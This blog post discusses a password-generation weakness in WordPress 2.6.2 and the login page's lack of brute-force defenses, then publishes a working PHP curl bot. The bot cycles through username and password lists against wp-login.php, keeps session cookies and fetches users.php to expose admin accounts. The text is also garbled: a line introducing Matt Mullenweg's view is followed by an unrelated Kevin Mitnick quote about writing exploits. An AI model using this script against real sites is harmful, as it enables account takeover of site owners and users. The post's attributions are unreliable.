He who is firmly seated in authority soon learns to think security, and not progress, the highest lesson of statecraft.
James Russell Lowell
Wordpress recently releases Wordpress version 2.6.2 after SecurityFocused released this article on “Wordpress Random Password Generation Insufficent Entropy Weakness”. There happens to be a rather clumsy but effective exploit published [wordpress exploit] to prove the actually problem. It is also noted that since this is a design flaw, and I’ve research most of the previous version almost all have this generation issue.
What is an administrator or web owner to do? Here is Matt Mullenweg’s attitude a lead developer of Wordpress on the subject.
I’d sit there and first I’d look through the comments, pick through the security holes, and then I’d see what the developer did to fix it because they’d always leave it well commented - thank you very much - and then I’d work back and figure out how I could write exploit code to exploit their vulnerabilities.
Kevin Mitnick
As shown time and time again the weakest part of security is the person, and in the case of Wordpress many of the developers don’t pay alot of attention to the security aspect until it’s a problem, it’s very reactionary and hardly ever proactive.
As an experiment for the several Wordpress blogs I run, I created a simple curl bot that would take an array of users and array of passwords and try to brute force through the front door of a login, and once in, request the users.php which would potentially always show the admin user name on the first page along with email.
Suprising even with this new Wordpress 2.6.2 with new entropy reinforced password generation I was able to crack several of my own users passwords with a simple set of wordlists, and user names. This is a crippling security flaw.
- No type of brute force detection, no ban system, no IP logging, no failed attempt. No front door security. This is equivalent of a locked door, in a place where no one can see you so you have all the time you need to get in.
- There should be no dictionary words or easy to guess passwords in the database. The system should make a check to insure the security of the lock as a whole.
That being said, I would like to release to the public the curl bot code I used. Please not you have to create a read/write text file in the same directory as the code below named cookie jar. I will come back and update this later but this all for now.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| define(POSTURL,'http://www.abc.xyz/wordpress/wp-login.php');
define(SEEKURL,'http://www.abc.xyz/wordpress/wp-admin/users.php');
$users = array ('admin','bleh');
$pwd = array('test','test2','test3');
foreach($users as $k=>$v){
foreach($pwd as $key => $value){
echo ck($v,$value);
}
}
function ck($log,$pwd){
$POSTVARS = 'log='.$log.'&pwd='.$pwd.'&wp-submit=Log+In&redirect_to='.urlencode(SEEKURL);
$ch = curl_init(POSTURL);
curl_setopt($ch, CURLOPT_POST ,4);
curl_setopt($ch, CURLOPT_POSTFIELDS ,$POSTVARS);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($ch, CURLOPT_HEADER ,1);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookiejar.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER ,1);
return curl_exec($ch);
} |
